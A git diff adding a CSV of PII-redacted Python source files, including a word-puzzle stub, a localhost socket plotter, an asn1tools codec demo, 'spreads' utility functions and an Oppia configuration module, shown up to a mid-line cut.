diff --git "a/entity_list.csv" "b/entity_list.csv" --- "a/entity_list.csv" +++ "b/entity_list.csv" @@ -1,2 +1,43989 @@ -,content,length,detected elements -0,"['""""""\n[2014-11-26] Challenge #190 [Intermediate] Words inside of words\n\nhttps://www.reddit.PI:KEY\n\n#Description\nThis weeks challenge is a short yet interesting one that should hopefully help you exercise elegant solutions to a\nproblem rather than bruteforcing a challenge.\n#Challenge\nGiven the wordlist [enable1.txt](http://www.joereynoldsaudio.com/enable1.txt), you must find the word in that file\nwhich also contains the greatest number of words within that word.\nFor example, the word \'grayson\' has the following words in it\nGrayson\nGray\nGrays\nRay\nRays\nSon\nOn\nHere\'s another example, the word \'reports\' has the following\nreports\nreport\nport\nports\nrep\nYou\'re tasked with finding the word in that file that contains the most words.\nNOTE : If you have a different wordlist you would like to use, you\'re free to do so.\n#Restrictions\n* To keep output slightly shorter, a word will only be considered a word if it is 2 or more letters in length\n* The word you are using may not be permuted to get a different set of words (You can\'t change \'report\' to \'repotr\' so\nthat you can add more words to your list)\n#Finally\nHave a good challenge idea?\nConsider submitting it to /r/dailyprogrammer_ideas\n""""""\n\n\ndef main():\n pass\n\n\nif __name__ == ""__main__"":\n main()\n', ""from mpl_toolkits.mplot3d import axes3d\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nfrom socket import *\nimport time\n\n# Объявляем все глобальные переменные\n\nHOST = '127.0.0.1'\nPORT = 21566\nBUFSIZ = 512\nADDR = (HOST, PORT)\n\nbad_packet = 0\ngood_packet = 0\n# fig, ax = plt.subplots()\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\n\n# Socket\n# tcpCliSock = socket(AF_INET, SOCK_STREAM)\n# tcpCliSock.connect(ADDR)\n# Запрет на ожидание\nplt.ion()\n\ntstart = time.time()\n# real-time plotting loop\n\nX, Y, Z = [], [], []\n\nwhile True:\n try:\n # читаем данные из сети\n tcpCliSock.c\n data = tcpCliSock.recv(BUFSIZ)\n if data:\n print(len(X), data)\n data = data.decode().split(',')\n if len(data) == 9:\n # print('Data received', data)\n # tcpCliSock.send(b'Ok')\n\n good_packet += 1\n else:\n bad_packet += 1\n\n # читаем данные из сети\n data = tcpCliSock.recv(BUFSIZ)\n X.append(data[0])\n Y.append(data[1])\n Z.append(data[2])\n\n frame = ax.scatter(X, Y, Z, c='b', marker='o')\n\n # Remove old line collection before drawing\n #if oldcol is not None:\n # ax.collections.remove(oldcol)\n\n plt.pause(0.001 / len(X))\n\n\n except KeyboardInterrupt:\n tcpCliSock.close()\n print('FPS: %f' % (len(X) / (time.time() - tstart)))\n break\n"", '#!/usr/bin/env python\n\n""""""Encoding and decoding of a question once for each codec.\n\nExample execution:\n\n$ ./question.py\nASN.1 specification:\n\n-- A simple protocol taken from Wikipedia.\n\nFoo DEFINITIONS ::= BEGIN\n\n Question ::= SEQUENCE {\n id INTEGER,\n question IA5String\n }\n\n Answer ::= SEQUENCE {\n id INTEGER,\n answer BOOLEAN\n }\n\nEND\n\nQuestion to encode: {\'id\': 1, \'question\': \'Is 1+1=3?\'}\n\nBER:\nEncoded: 300e0201011609497320312b313d333f (16 bytes)\nDecoded: {\'id\': 1, \'question\': \'Is 1+1=3?\'}\n\nDER:\nEncoded: 300e0201011609497320312b313d333f (16 bytes)\nDecoded: {\'id\': 1, \'question\': \'Is 1+1=3?\'}\n\nJER:\nEncoded: PI:KEY (31 bytes)\nDecoded: {\'id\': 1, \'question\': \'Is 1+1=3?\'}\n\nOER:\nEncoded: 010109497320312b313d333f (12 bytes)\nDecoded: {\'id\': 1, \'question\': \'Is 1+1=3?\'}\n\nPER:\nEncoded: 010109497320312b313d333f (12 bytes)\nDecoded: {\'id\': 1, \'question\': \'Is 1+1=3?\'}\n\nUPER:\nEncoded: 01010993cd03156c5eb37e (11 bytes)\nDecoded: {\'id\': 1, \'question\': \'Is 1+1=3?\'}\n\nXER:\nEncoded: PI:KEY (61 bytes)\nDecoded: {\'id\': 1, \'question\': \'Is 1+1=3?\'}\n\nProtocol Buffers:\nEncoded: 08011209497320312b313d333f (13 bytes)\nDecoded:\nid: 1\nquestion: ""Is 1+1=3?""\n$\n\n""""""\n\nfrom __future__ import print_function\nimport os\nfrom binascii import hexlify\nimport asn1tools\nfrom foo_pb2 import Question\n\nSCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))\nFOO_ASN_PATH = os.path.join(SCRIPT_DIR,\n \'..\',\n \'..\',\n \'..\',\n \'tests\',\n \'files\',\n \'foo.asn\')\n\n# Print the specification.\nprint(\'ASN.1 specification:\')\nprint()\n\nwith open(FOO_ASN_PATH) as fin:\n print(fin.read())\n\n# The question to encode.\nquestion = {\'id\': 1, \'question\': \'Is 1+1=3?\'}\n\nprint(""Question to encode:"", question)\n\n# Encode and decode the question once for each codec.\nfor codec in [\'ber\', \'der\', \'jer\', \'oer\', \'per\', \'uper\', \'xer\']:\n foo = asn1tools.compile_files(FOO_ASN_PATH, codec)\n encoded = foo.encode(\'Question\', question)\n decoded = foo.decode(\'Question\', encoded)\n\n print()\n print(\'{}:\'.format(codec.upper()))\n print(\'Encoded: {} ({} bytes)\'.format(hexlify(encoded).decode(\'ascii\'),\n len(encoded)))\n print(\'Decoded:\', decoded)\n\n\n# Also encode using protocol buffers.\nquestion = Question()\nquestion.id = 1\nquestion.question = \'Is 1+1=3?\'\n\nencoded = question.SerializeToString()\ndecoded = question\n\nprint()\nprint(\'Protocol Buffers:\')\nprint(\'Encoded: {} ({} bytes)\'.format(hexlify(encoded).decode(\'ascii\'),\n len(encoded)))\nprint(\'Decoded:\')\nprint(decoded)\n', '# -*- coding: utf-8 -*-\n\n# Copyright (C) 2014 Johannes Baiter dummy@email.com\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n\n""""""\nVarious utility functions and classes.\n""""""\n\nfrom __future__ import division, unicode_literals, print_function\n\nimport abc\nimport glob\nimport json\nimport logging\nimport os\nimport pkg_resources\nimport platform\nimport re\nimport subprocess\nfrom unicodedata import normalize\n\nimport blinker\nimport colorama\nimport psutil\nimport roman\nfrom colorama import Fore, Back, Style\nfrom spreads.vendor.pathlib import Path\n\n\nclass SpreadsException(Exception):\n """""" General exception """"""\n pass\n\n\nclass DeviceException(SpreadsException):\n """""" Raised when a device-related error occured. """"""\n pass\n\n\nclass MissingDependencyException(SpreadsException):\n """""" Raised when a dependency for a plugin is missing. """"""\n pass\n\n\ndef get_version():\n """""" Get installed version via pkg_resources. """"""\n return pkg_resources.require(\'spreads\')[0].version\n\n\ndef find_in_path(name):\n """""" Find executable in $PATH.\n\n :param name: name of the executable\n :type name: unicode\n :returns: Path to executable or None if not found\n :rtype: unicode or None\n\n """"""\n candidates = None\n if is_os(\'windows\'):\n import _winreg\n if name.startswith(\'scantailor\'):\n try:\n cmd = _winreg.QueryValue(\n _winreg.HKEY_CLASSES_ROOT,\n \'Scan Tailor Project\\\\shell\\\\open\\\\command\')\n bin_path = cmd.split(\'"" ""\')[0][1:]\n if name.endswith(\'-cli\'):\n bin_path = bin_path[:-4] + ""-cli.exe""\n return bin_path if os.path.exists(bin_path) else None\n except OSError:\n return None\n else:\n path_dirs = os.environ.get(\'PATH\').split(\';\')\n path_dirs.append(os.getcwd())\n path_exts = os.environ.get(\'PATHEXT\').split(\';\')\n candidates = (os.path.join(p, name + e)\n for p in path_dirs\n for e in path_exts)\n else:\n candidates = (os.path.join(p, name)\n for p in os.environ.get(\'PATH\').split(\':\'))\n return next((c for c in candidates if os.path.exists(c)), None)\n\n\ndef is_os(osname):\n """""" Check if the current operating system matches the expected.\n\n :param osname: Operating system name as returned by\n :py:func:`platform.system`\n :returns: Whether the OS matches or not\n :rtype: bool\n """"""\n return platform.system().lower() == osname\n\n\ndef check_futures_exceptions(futures):\n """""""" Go through passed :py:class:`concurrent.futures._base.Future` objects\n and re-raise the first Exception raised by any one of them.\n\n :param futures: Iterable that contains the futures to be checked\n :type futures: iterable with :py:class:`concurrent.futures._base.Future`\n instances\n """"""\n if any(x.exception() for x in futures):\n raise next(x for x in futures if x.exception()).exception()\n\n\ndef get_free_space(path):\n """""" Return free space on file-system underlying the passed path.\n\n :param path: Path on file-system the free space of which is desired.\n :type path; unicode\n :return: Free space in bytes.\n :rtype: int\n\n """"""\n return psutil.disk_usage(unicode(path)).free\n\n\ndef get_subprocess(cmdline, **kwargs):\n """""" Get a :py:class:`subprocess.Popen` instance.\n\n On Windows systems, the process will be ran in the background and won\'t\n open a cmd-window or appear in the taskbar.\n The function signature matches that of the :py:class:`subprocess.Popen`\n initialization method.\n """"""\n if subprocess.mswindows and \'startupinfo\' not in kwargs:\n su = subprocess.STARTUPINFO()\n su.dwFlags |= subprocess.STARTF_USESHOWWINDOW\n su.wShowWindow = subprocess.SW_HIDE\n kwargs[\'startupinfo\'] = su\n return subprocess.Popen(cmdline, **kwargs)\n\n\ndef wildcardify(pathnames):\n """""" Try to generate a single path with wildcards that matches all\n `pathnames`.\n\n :param pathnames: List of pathnames to find a wildcard string for\n :type pathanmes: List of str/unicode\n :return: The wildcard string or None if none was found\n :rtype: unicode or None\n """"""\n wildcard_str = """"\n for idx, char in enumerate(pathnames[0]):\n if all(p[idx] == char for p in pathnames[1:]):\n wildcard_str += char\n elif not wildcard_str or wildcard_str[-1] != ""*"":\n wildcard_str += ""*""\n matched_paths = glob.glob(wildcard_str)\n if not sorted(pathnames) == sorted(matched_paths):\n return None\n return wildcard_str\n\n\ndef diff_dicts(old, new):\n """""" Get the difference between two dictionaries.\n\n :param old: Dictionary to base comparison on\n :type old: dict\n :param new: Dictionary to compare with\n :type new: dict\n :return: A (possibly nested) dictionary containing all items from `new`\n that differ from the ones in `old`\n :rtype: dict\n """"""\n out = {}\n for key, value in old.iteritems():\n if new[key] != value:\n out[key] = new[key]\n elif isinstance(value, dict):\n diff = diff_dicts(value, new[key])\n if diff:\n out[key] = diff\n return out\n\n\ndef slugify(text, delimiter=u\'-\'):\n """"""Generates an ASCII-only slug.\n\n Code adapted from Flask snipped by Armin Ronacher:\n http://flask.pocoo.org/snippets/5/\n\n :param text: Text to create slug for\n :type text: unicode\n :param delimiter: Delimiter to use in slug\n :type delimiter: unicode\n :return: The generated slug\n :rtype: unicode\n """"""\n punctuation_re = r\'[\\t !""#$%&\\\'()*\\-/<=>?@\\[\\\\\\]^_`{|},.]+\'\n result = []\n for word in re.split(punctuation_re, text.lower()):\n word = normalize(\'NFKD\', word).encode(\'ascii\', \'ignore\')\n if word:\n result.append(word)\n return unicode(delimiter.join(result))\n\n\nclass _instancemethodwrapper(object): # noqa\n def __init__(self, callable):\n self.callable = callable\n self.__dontcall__ = False\n\n def __getattr__(self, key):\n return getattr(self.callable, key)\n\n def __call__(self, *args, **kwargs):\n if self.__dontcall__:\n raise TypeError(\'Attempted to call abstract method.\')\n return self.callable(*args, **kwargs)\n\n\nclass _classmethod(classmethod): # noqa\n def __init__(self, func):\n super(_classmethod, self).__init__(func)\n isabstractmethod = getattr(func, \'__isabstractmethod__\', False)\n if isabstractmethod:\n self.__isabstractmethod__ = isabstractmethod\n\n def __get__(self, instance, owner):\n result = _instancemethodwrapper(super(_classmethod, self)\n .__get__(instance, owner))\n isabstractmethod = getattr(self, \'__isabstractmethod__\', False)\n if isabstractmethod:\n result.__isabstractmethod__ = isabstractmethod\n abstractmethods = getattr(owner, \'__abstractmethods__\', None)\n if abstractmethods and result.__name__ in abstractmethods:\n result.__dontcall__ = True\n return result\n\n\nclass abstractclassmethod(_classmethod): # noqa\n """""" New decorator class that implements the @abstractclassmethod decorator\n added in Python 3.3 for Python 2.7.\n\n Kudos to http://stackoverflow.com/a/13640018/487903\n """"""\n def __init__(self, func):\n func = abc.abstractmethod(func)\n super(abstractclassmethod, self).__init__(func)\n\n\nclass ColourStreamHandler(logging.StreamHandler):\n """""" A colorized output StreamHandler\n\n Kudos to Leigh MacDonald: http://goo.gl/Lpr6C5\n """"""\n\n # Some basic colour scheme defaults\n colours = {\n \'DEBUG\': Fore.CYAN,\n \'INFO\': Fore.GREEN,\n \'WARN\': Fore.YELLOW,\n \'WARNING\': Fore.YELLOW,\n \'ERROR\': Fore.RED,\n \'CRIT\': Back.RED + Fore.WHITE,\n \'CRITICAL\': Back.RED + Fore.WHITE\n }\n\n @property\n def is_tty(self):\n """""" Check if we are using a ""real"" TTY. If we are not using a TTY it\n means that the colour output should be disabled.\n\n :return: Using a TTY status\n :rtype: bool\n """"""\n try:\n return getattr(self.stream, \'isatty\', None)()\n except:\n return False\n\n def emit(self, record):\n try:\n message = self.format(record)\n if not self.is_tty:\n self.stream.write(message)\n else:\n self.stream.write(self.colours[record.levelname] +\n message + Style.RESET_ALL)\n self.stream.write(getattr(self, \'terminator\', \'\\n\'))\n self.flush()\n except (KeyboardInterrupt, SystemExit):\n raise\n except:\n self.handleError(record)\n\n\nclass EventHandler(logging.Handler):\n """""" Subclass of :py:class:`logging.Handler` that emits a\n :py:class:`blinker.base.Signal` whenever a new record is emitted.\n """"""\n signals = blinker.Namespace()\n on_log_emit = signals.signal(\'logrecord\', doc=""""""\\\n Sent when a log record was emitted.\n\n :keyword :class:`logging.LogRecord` record: the LogRecord\n """""")\n\n def emit(self, record):\n self.on_log_emit.send(record=record)\n\n\ndef get_data_dir(create=False):\n """""" Return (and optionally create) the user\'s default data directory.\n\n :param create: Create the data directory if it doesn\'t exist\n :type create: bool\n :return: Path to the default data directory\n :rtype: unicode\n """"""\n unix_dir_var = \'XDG_DATA_HOME\'\n unix_dir_fallback = \'~/.config\'\n windows_dir_var = \'APPDATA\'\n windows_dir_fallback = \'~\\\\AppData\\\\Roaming\'\n mac_dir = \'~/Library/Application Support\'\n base_dir = None\n if is_os(\'darwin\'):\n if Path(unix_dir_fallback).exists:\n base_dir = unix_dir_fallback\n else:\n base_dir = mac_dir\n elif is_os(\'windows\'):\n if windows_dir_var in os.environ:\n base_dir = os.environ[windows_dir_var]\n else:\n base_dir = windows_dir_fallback\n else:\n if unix_dir_var in os.environ:\n base_dir = os.environ[unix_dir_var]\n else:\n base_dir = unix_dir_fallback\n app_path = Path(base_dir)/\'spreads\'\n if create and not app_path.exists():\n app_path.mkdir()\n return unicode(app_path)\n\n\ndef colorize(text, color):\n """""" Return text with a new ANSI foreground color.\n\n :param text: Text to be wrapped\n :param color: ANSI color to wrap text in\n :type color: str (from `colorama.ansi `)\n :return: Colorized text\n """"""\n return color + text + colorama.Fore.RESET\n\n\nclass RomanNumeral(object):\n """""" Number type that represents integers as Roman numerals and that\n can be used in all arithmetic operations applicable to integers.\n """"""\n @staticmethod\n def is_roman(value):\n """""" Check if `value` is a valid Roman numeral.\n\n :param value: Value to be checked\n :type value: unicode\n :returns: Whether the value is valid or not\n :rtype: bool\n """"""\n return bool(roman.romanNumeralPattern.match(value))\n\n def __init__(self, value, case=\'upper\'):\n """""" Create a new instance.\n\n :param value: Value of the instance\n :type value: int, unicode containing valid Roman numeral or\n :py:class:`RomanNumeral`\n """"""\n self._val = self._to_int(value)\n self._case = case\n if isinstance(value, basestring) and not self.is_roman(value):\n self._case = \'lower\'\n elif isinstance(value, RomanNumeral):\n self._case = value._case\n\n def _to_int(self, value):\n if isinstance(value, int):\n return value\n elif isinstance(value, basestring) and self.is_roman(value.upper()):\n return roman.fromRoman(value.upper())\n elif isinstance(value, RomanNumeral):\n return value._val\n else:\n raise ValueError(""Value must be a valid roman numeral, a string""\n "" representing one or an integer: \'{0}\'""\n .format(value))\n\n def __cmp__(self, other):\n if self._val > self._to_int(other):\n return 1\n elif self._val == self._to_int(other):\n return 0\n elif self._val < self._to_int(other):\n return -1\n\n def __add__(self, other):\n return RomanNumeral(self._val + self._to_int(other), self._case)\n\n def __sub__(self, other):\n return RomanNumeral(self._val - self._to_int(other), self._case)\n\n def __int__(self):\n return self._val\n\n def __str__(self):\n strval = roman.toRoman(self._val)\n if self._case == \'lower\':\n return strval.lower()\n else:\n return strval\n\n def __unicode__(self):\n return unicode(str(self))\n\n def __repr__(self):\n return str(self)\n\n\nclass CustomJSONEncoder(json.JSONEncoder):\n """""" Custom :py:class:`json.JSONEncoder`.\n\n Uses an object\'s `to_dict` method if present for serialization.\n\n Serializes :py:class:`pathlib.Path` instances to the string\n representation of their relative path to a BagIt-compliant directory or\n their absolute path if not applicable.\n """"""\n def default(self, obj):\n if hasattr(obj, \'to_dict\'):\n return obj.to_dict()\n if isinstance(obj, Path):\n # Serialize paths that belong to a workflow as paths relative to\n # its base directory\n base = next((p for p in obj.parents if (p/\'bagit.txt\').exists()),\n None)\n if base:\n return unicode(obj.relative_to(base))\n else:\n return unicode(obj.absolute())\n return json.JSONEncoder.default(self, obj)\n', '# coding: utf-8\n#\n# Copyright 2014 The Oppia Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the ""License"");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an ""AS-IS"" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n""""""Stores various configuration options and constants for Oppia.""""""\n\nimport copy\nimport datetime\nimport os\n\n\n# Whether to unconditionally log info messages.\nDEBUG = False\n\n# The platform for the storage backend. This is used in the model-switching\n# code in core/platform.\nPLATFORM = \'gae\'\n\n# This should be string comparison, since all environment variables\n# are converted to string\nIS_MINIFIED = os.environ.get(\'MINIFICATION\') == \'True\'\n\n# Whether we should serve the development or production experience.\n# DEV_MODE should only be changed to False in the production environment.\n# To use minified resources in the development environment,\n# change the MINIFICATION env variable in app.yaml to True.\n# When DEV_MODE is True, this indicates that we are not running in\n# the production App Engine environment, which affects things like\n# login/logout URLs,as well as third-party libraries\n# that App Engine normally provides.\nif PLATFORM == \'gae\':\n DEV_MODE = (\n not os.environ.get(\'SERVER_SOFTWARE\')\n or os.environ[\'SERVER_SOFTWARE\'].startswith(\'Development\'))\nelse:\n raise Exception(\'Invalid platform: expected one of [\\\'gae\\\']\')\n\nTESTS_DATA_DIR = os.path.join(\'core\', \'tests\', \'data\')\nSAMPLE_EXPLORATIONS_DIR = os.path.join(\'data\', \'explorations\')\nSAMPLE_COLLECTIONS_DIR = os.path.join(\'data\', \'collections\')\nINTERACTIONS_DIR = os.path.join(\'extensions\', \'interactions\')\nGADGETS_DIR = os.path.join(\'extensions\', \'gadgets\')\nRTE_EXTENSIONS_DIR = os.path.join(\'extensions\', \'rich_text_components\')\n\nOBJECT_TEMPLATES_DIR = os.path.join(\'extensions\', \'objects\', \'templates\')\n\n# Choose production template if minification flag is used or\n# if in production mode\nTEMPLATES_DIR_PREFIX = \'prod\' if (IS_MINIFIED or not DEV_MODE) else \'dev\'\nFRONTEND_TEMPLATES_DIR = os.path.join(\n \'core\', \'templates\', TEMPLATES_DIR_PREFIX, \'head\')\nDEPENDENCIES_TEMPLATES_DIR = os.path.join(\'extensions\', \'dependencies\')\nVALUE_GENERATORS_DIR = os.path.join(\'extensions\', \'value_generators\')\nOBJECT_DEFAULT_VALUES_FILE_PATH = os.path.join(\n \'extensions\', \'interactions\', \'object_defaults.json\')\nRULES_DESCRIPTIONS_FILE_PATH = os.path.join(\n os.getcwd(), \'extensions\', \'interactions\', \'rules.json\')\n\n# The maximum number of results to retrieve in a datastore query.\nDEFAULT_QUERY_LIMIT = 1000\n\n# The maximum number of results to retrieve in a datastore query\n# for top rated published explorations in /library page.\nNUMBER_OF_TOP_RATED_EXPLORATIONS_FOR_LIBRARY_PAGE = 8\n\n# The maximum number of results to retrieve in a datastore query\n# for recently published explorations in /library page.\nRECENTLY_PUBLISHED_QUERY_LIMIT_FOR_LIBRARY_PAGE = 8\n\n# The maximum number of results to retrieve in a datastore query\n# for top rated published explorations in /library/top_rated page.\nNUMBER_OF_TOP_RATED_EXPLORATIONS_FULL_PAGE = 20\n\n# The maximum number of results to retrieve in a datastore query\n# for recently published explorations in /library/recently_published page.\nRECENTLY_PUBLISHED_QUERY_LIMIT_FULL_PAGE = 20\n\n# The current version of the dashboard stats blob schema. If any backward-\n# incompatible changes are made to the stats blob schema in the data store,\n# this version number must be changed.\nCURRENT_DASHBOARD_STATS_SCHEMA_VERSION = 1\n\n# The current version of the exploration states blob schema. If any backward-\n# incompatible changes are made to the states blob schema in the data store,\n# this version number must be changed and the exploration migration job\n# executed.\nCURRENT_EXPLORATION_STATES_SCHEMA_VERSION = 7\n\n# The current version of the all collection blob schemas (such as the nodes\n# structure within the Collection domain object). If any backward-incompatible\n# changes are made to any of the blob schemas in the data store, this version\n# number must be changed.\nCURRENT_COLLECTION_SCHEMA_VERSION = 2\n\n# The default number of exploration tiles to load at a time in the search\n# results page.\nSEARCH_RESULTS_PAGE_SIZE = 20\n\n# The default number of commits to show on a page in the exploration history\n# tab.\nCOMMIT_LIST_PAGE_SIZE = 50\n\n# The default number of items to show on a page in the exploration feedback\n# tab.\nFEEDBACK_TAB_PAGE_SIZE = 20\n\n# Default title for a newly-minted exploration.\nDEFAULT_EXPLORATION_TITLE = \'\'\n# Default category for a newly-minted exploration.\nDEFAULT_EXPLORATION_CATEGORY = \'\'\n# Default objective for a newly-minted exploration.\nDEFAULT_EXPLORATION_OBJECTIVE = \'\'\n\n# Default name for the initial state of an exploration.\nDEFAULT_INIT_STATE_NAME = \'Introduction\'\n# The default content text for the initial state of an exploration.\nDEFAULT_INIT_STATE_CONTENT_STR = \'\'\n\n# Default title for a newly-minted collection.\nDEFAULT_COLLECTION_TITLE = \'\'\n# Default category for a newly-minted collection.\nDEFAULT_COLLECTION_CATEGORY = \'\'\n# Default objective for a newly-minted collection.\nDEFAULT_COLLECTION_OBJECTIVE = \'\'\n\n# A dict containing the accepted image formats (as determined by the imghdr\n# module) and the corresponding allowed extensions in the filenames of uploaded\n# files.\nACCEPTED_IMAGE_FORMATS_AND_EXTENSIONS = {\n \'jpeg\': [\'jpg\', \'jpeg\'],\n \'png\': [\'png\'],\n \'gif\': [\'gif\']\n}\n\n# A string containing the disallowed characters in state or exploration names.\n# The underscore is needed because spaces in names must be converted to\n# underscores when displayed as part of a URL or key. The other conventions\n# here are derived from the Wikipedia guidelines for naming articles.\nINVALID_NAME_CHARS = u\':#/|_%<>[]{}\\ufffd\\\\\' + chr(127)\nfor ind in range(32):\n INVALID_NAME_CHARS += chr(ind)\n# Prefix for data sent from the server to the client via JSON.\nXSSI_PREFIX = \')]}\\\'\\n\'\n# A regular expression for alphanumeric characters.\nALPHANUMERIC_REGEX = r\'^[A-Za-z0-9]+$\'\n# A regular expression for alphanumeric words separated by single spaces.\n# Ex.: \'valid name\', \'another valid name\', \'invalid name\'.\nALPHANUMERIC_SPACE_REGEX = r\'^[0-9A-Za-z]+(?:[ ]?[0-9A-Za-z]+)*$\'\n# A regular expression for tags.\nTAG_REGEX = r\'^[a-z ]+$\'\n\n# Invalid names for parameters used in expressions.\nAUTOMATICALLY_SET_PARAMETER_NAMES = [\'answer\', \'choices\']\nINVALID_PARAMETER_NAMES = AUTOMATICALLY_SET_PARAMETER_NAMES + [\n \'abs\', \'all\', \'and\', \'any\', \'else\', \'floor\', \'if\', \'log\', \'or\',\n \'pow\', \'round\', \'then\']\n\n# These are here rather than in rating_services.py to avoid import\n# circularities with exp_services.\n# TODO (Jacob) Refactor exp_services to remove this problem.\n_EMPTY_RATINGS = {\'1\': 0, \'2\': 0, \'3\': 0, \'4\': 0, \'5\': 0}\ndef get_empty_ratings():\n return copy.deepcopy(_EMPTY_RATINGS)\n\n# Empty scaled average rating as a float.\nEMPTY_SCALED_AVERAGE_RATING = 0.0\n\n# To use GAE email service.\nEMAIL_SERVICE_PROVIDER_GAE = \'gae_email_service\'\n# To use mailgun email service.\nEMAIL_SERVICE_PROVIDER_MAILGUN = \'mailgun_email_service\'\n# Use GAE email service by default.\nEMAIL_SERVICE_PROVIDER = EMAIL_SERVICE_PROVIDER_GAE\n# If the Mailgun email API is used, the ""None"" below should be replaced\n# with the Mailgun API key.\nMAILGUN_API_KEY = None\n# If the Mailgun email API is used, the ""None"" below should be replaced\n# with the Mailgun domain name (ending with mailgun.org).\nMAILGUN_DOMAIN_NAME = None\n# Committer id for system actions.\nSYSTEM_COMMITTER_ID = \'admin\'\nSYSTEM_EMAIL_ADDRESS = dummy@email.com\'\nADMIN_EMAIL_ADDRESS = dummy@email.com\'\nNOREPLY_EMAIL_ADDRESS = dummy@email.com\'\n# Ensure that SYSTEM_EMAIL_ADDRESS and ADMIN_EMAIL_ADDRESS are both valid and\n# correspond to owners of the app before setting this to True. If\n# SYSTEM_EMAIL_ADDRESS is not that of an app owner, email messages from this\n# address cannot be sent. If True then emails can be sent to any user.\nCAN_SEND_EMAILS = False\n# If you want to turn on this facility please check the email templates in the\n# send_role_notification_email() function in email_manager.py and modify them\n# accordingly.\nCAN_SEND_EDITOR_ROLE_EMAILS = False\n# If enabled then emails will be sent to creators for feedback messages.\nCAN_SEND_FEEDBACK_MESSAGE_EMAILS = False\n# Time to wait before sending feedback message emails (currently set to 1\n# hour).\nDEFAULT_FEEDBACK_MESSAGE_EMAIL_COUNTDOWN_SECS = 3600\n# Whether to send an email when new feedback message is received for\n# an exploration.\nDEFAULT_FEEDBACK_MESSAGE_EMAIL_PREFERENCE = True\n# Whether to send email updates to a user who has not specified a preference.\nDEFAULT_EMAIL_UPDATES_PREFERENCE = False\n# Whether to send an invitation email when the user is granted\n# new role permissions in an exploration.\nDEFAULT_EDITOR_ROLE_EMAIL_PREFERENCE = True\n# Whether to require an email to be sent, following a moderator action.\nREQUIRE_EMAIL_ON_MODERATOR_ACTION = False\n# Whether to allow custom event reporting to Google Analytics.\nCAN_SEND_ANALYTICS_EVENTS = False\n# Timespan in minutes before allowing duplicate emails.\nDUPLICATE_EMAIL_INTERVAL_MINS = 2\n# Number of digits after decimal to which the average ratings value in the\n# dashboard is rounded off to.\nAVERAGE_RATINGS_DASHBOARD_PRECISION = 2\n\nEMAIL_INTENT_SIGNUP = \'signup\'\nEMAIL_INTENT_DAILY_BATCH = \'daily_batch\'\nEMAIL_INTENT_EDITOR_ROLE_NOTIFICATION = \'editor_role_notification\'\nEMAIL_INTENT_FEEDBACK_MESSAGE_NOTIFICATION = \'feedback_message_notification\'\nEMAIL_INTENT_SUGGESTION_NOTIFICATION = \'suggestion_notification\'\nEMAIL_INTENT_REPORT_BAD_CONTENT = \'report_bad_content\'\nEMAIL_INTENT_MARKETING = \'marketing\'\nEMAIL_INTENT_PUBLICIZE_EXPLORATION = \'publicize_exploration\'\nEMAIL_INTENT_UNPUBLISH_EXPLORATION = \'unpublish_exploration\'\nEMAIL_INTENT_DELETE_EXPLORATION = \'delete_exploration\'\n\nMODERATOR_ACTION_PUBLICIZE_EXPLORATION = \'publicize_exploration\'\nMODERATOR_ACTION_UNPUBLISH_EXPLORATION = \'unpublish_exploration\'\nDEFAULT_SALUTATION_HTML_FN = (\n lambda recipient_username: \'Hi %s,\' % recipient_username)\nDEFAULT_SIGNOFF_HTML_FN = (\n lambda sender_username: (\n \'Thanks!
%s (Oppia moderator)\' % sender_username))\n\nVALID_MODERATOR_ACTIONS = {\n MODERATOR_ACTION_PUBLICIZE_EXPLORATION: {\n \'email_config\': \'publicize_exploration_email_html_body\',\n \'email_subject_fn\': (\n lambda exp_title: (\n \'Your Oppia exploration ""%s"" has been featured!\' % exp_title)),\n \'email_intent\': EMAIL_INTENT_PUBLICIZE_EXPLORATION,\n \'email_salutation_html_fn\': DEFAULT_SALUTATION_HTML_FN,\n \'email_signoff_html_fn\': DEFAULT_SIGNOFF_HTML_FN,\n },\n MODERATOR_ACTION_UNPUBLISH_EXPLORATION: {\n \'email_config\': \'unpublish_exploration_email_html_body\',\n \'email_subject_fn\': (\n lambda exp_title: (\n \'Your Oppia exploration ""%s"" has been unpublished\' % exp_title)\n ),\n \'email_intent\': \'unpublish_exploration\',\n \'email_salutation_html_fn\': DEFAULT_SALUTATION_HTML_FN,\n \'email_signoff_html_fn\': DEFAULT_SIGNOFF_HTML_FN,\n },\n}\n\n# Panel properties and other constants for the default skin.\nGADGET_PANEL_AXIS_HORIZONTAL = \'horizontal\'\nPANELS_PROPERTIES = {\n \'bottom\': {\n \'width\': 350,\n \'height\': 100,\n \'stackable_axis\': GADGET_PANEL_AXIS_HORIZONTAL,\n \'pixels_between_gadgets\': 80,\n \'max_gadgets\': 1\n }\n}\n\n# When the site terms were last updated, in UTC.\nREGISTRATION_PAGE_LAST_UPDATED_UTC = datetime.datetime(2015, 10, 14, 2, 40, 0)\n\n# Format of string for dashboard statistics logs.\n# NOTE TO DEVELOPERS: This format should not be changed, since it is used in\n# the existing storage models for UserStatsModel.\nDASHBOARD_STATS_DATETIME_STRING_FORMAT = \'%Y-%m-%d\'\n\n# The maximum size of an uploaded file, in bytes.\nMAX_FILE_SIZE_BYTES = 1048576\n\n# The default language code for an exploration.\nDEFAULT_LANGUAGE_CODE = \'en\'\n\n# The id of the default skin.\n# TODO(sll): Deprecate this; it is no longer used.\nDEFAULT_SKIN_ID = \'conversation_v1\'\n\n# The prefix for an \'accepted suggestion\' commit message.\nCOMMIT_MESSAGE_ACCEPTED_SUGGESTION_PREFIX = \'Accepted suggestion by\'\n\n# User id and username for exploration migration bot. 